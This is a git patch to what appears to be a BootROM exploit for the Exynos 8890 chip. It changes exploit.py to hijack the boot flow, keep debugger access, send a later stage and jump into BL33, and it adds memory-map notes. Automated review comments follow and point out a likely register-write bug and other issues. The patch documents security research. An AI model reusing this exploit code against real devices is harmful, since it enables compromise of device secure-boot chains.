From fe58a3b869924c0f4c1d62dc18474aef3ba22b8c Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen
Date: Mon, 16 Sep 2024 17:14:14 +0200
Subject: [PATCH] reads B33
---
 documentation/source/BootROM_8890/04_notes.rst | 6 ++++++
 .../source/_ignore/stack_and_functions.csv | 3 ++-
 source/exploit/exploit.py | 14 +++++++++++++-
 3 files changed, 21 insertions(+), 2 deletions(-)
diff --git a/documentation/source/BootROM_8890/04_notes.rst b/documentation/source/BootROM_8890/04_notes.rst
index ba5b5bb..aa16e3e 100644
--- a/documentation/source/BootROM_8890/04_notes.rst
+++ b/documentation/source/BootROM_8890/04_notes.rst
@@ -207,3 +207,9 @@ Current EL: 0xc
 The debugger at 0x11200000 can only dump 0x768 at a time (its space related. Before BL31 this is also an issue.).
+There's an odd space at 0x14kk. With things like deadcafe:
+
+.. code::
+
+ 1c0000000000000000000000fecaadde00000000fecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddef
+
diff --git a/documentation/source/_ignore/stack_and_functions.csv b/documentation/source/_ignore/stack_and_functions.csv
index 51ba7c9..4556723 100644
--- a/documentation/source/_ignore/stack_and_functions.csv
+++ b/documentation/source/_ignore/stack_and_functions.csv
@@ -17,4 +17,5 @@ start,end,name,order,comment,X0,LR
 0x14AC0000,0x14ac5000,mali@14AC0000,,,,
 0x02035600,0x02035608,TTBR0_EL3,,,,
 0x11200000,0x11207000,Last relocated debugger,,,,
-0xa0000000,0xa0013fff,Parts of BL2 in IMEM,,,,
\ No newline at end of file
+0xa0000000,0xa0013fff,Parts of BL2 in IMEM,,,,
+0x14000000,1400060000,DEADCAFE,,,,
\ No newline at end of file
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 7fbe2c2..ac9e47a 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -772,10 +772,12 @@ class ExynosDevice():
 print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')
 # Restore bootflow
+ BL33_jump = self.cd.arch_dbg.state.X0
+ self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
 # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
 # Disable this to keep access to the debugger after senindg the next stage
- # self.cd.restore_stack_and_jump(hijacked_fun)
+ self.cd.restore_stack_and_jump(hijacked_fun)
 # ==== Stage 5 ====
 #self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
@@ -790,6 +792,10 @@ class ExynosDevice():
 # assert len(stage4) == stage4_len, "Invalid stage4 length"
 self.send_normal_stage(stage4)
+ self.connect_device()
+ self.usb_read(0x200) # GiAs
+ self.cd.arch_dbg.X0 = BL33_jump
+ self.cd.jump_to(0x8f000000)
 # TRYOUT PATCHING BL33
 # BL1 is loaded, now authenticate and patch it
@@ -812,6 +818,12 @@ class ExynosDevice():
 time.sleep(2)
+ # # dump in stages of 100 000 bytes and append to dump
+ # dump = b""
+ # for i in range(0x80000000, 0xf0000000, 0x100000):
+ # dump += self.cd.memdump_region(i, 0x100000)
+
+ pass
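Review bot: The re-enabled `self.cd.restore_stack_and_jump(hijacked_fun)` now sits directly under the context comment `# Disable this to keep access to the debugger after senindg the next stage`, which describes the disabled state this hunk reverts, so the comment is now misleading; replace it with something that matches the live code, e.g. `# Restore the hijacked stack and continue the boot flow (LR was set to DEBUGGER_ADDR above)`. The new local `BL33_jump` should follow snake_case (`bl33_jump`) and deserves a one-line comment saying that the original X0 is being saved before the register state is modified, since nothing else in the hunk explains why it is captured here. The enclosing method starts outside the hunk.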
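Review bot: `self.cd.arch_dbg.X0 = BL33_jump` writes `X0` on `arch_dbg` itself, while the value was read from `self.cd.arch_dbg.state.X0` and `LR` is written through `self.cd.arch_dbg.state.LR` in the first hunk, so this line presumably creates a stray attribute instead of updating the register state; it should read `self.cd.arch_dbg.state.X0 = BL33_jump`. The return value of `self.usb_read(0x200) # GiAs` is discarded without any check, and `0x8f000000` is a bare magic address beside the named `DEBUGGER_ADDR`; give it a module constant with a comment naming what is expected to live there. `BL33_jump` is bound in the first hunk, so if these hunks are not in the same method this is an unbound name. The enclosing method starts and ends outside the hunk.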
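Review bot: The added lines are commented-out code followed by a bare `pass`, which is a no-op after `time.sleep(2)` and leaves dead text in the method; either drop the block or move it into a helper behind a flag. The commented loop also disagrees with its own numbers: the comment says `100 000 bytes` while the range step and `memdump_region` length are `0x100000` (1,048,576 bytes). If the block is kept as a note, change the comment to `# dump in 0x100000-byte (1 MiB) chunks and append to dump` and delete the trailing `pass`. The enclosing method starts outside the hunk.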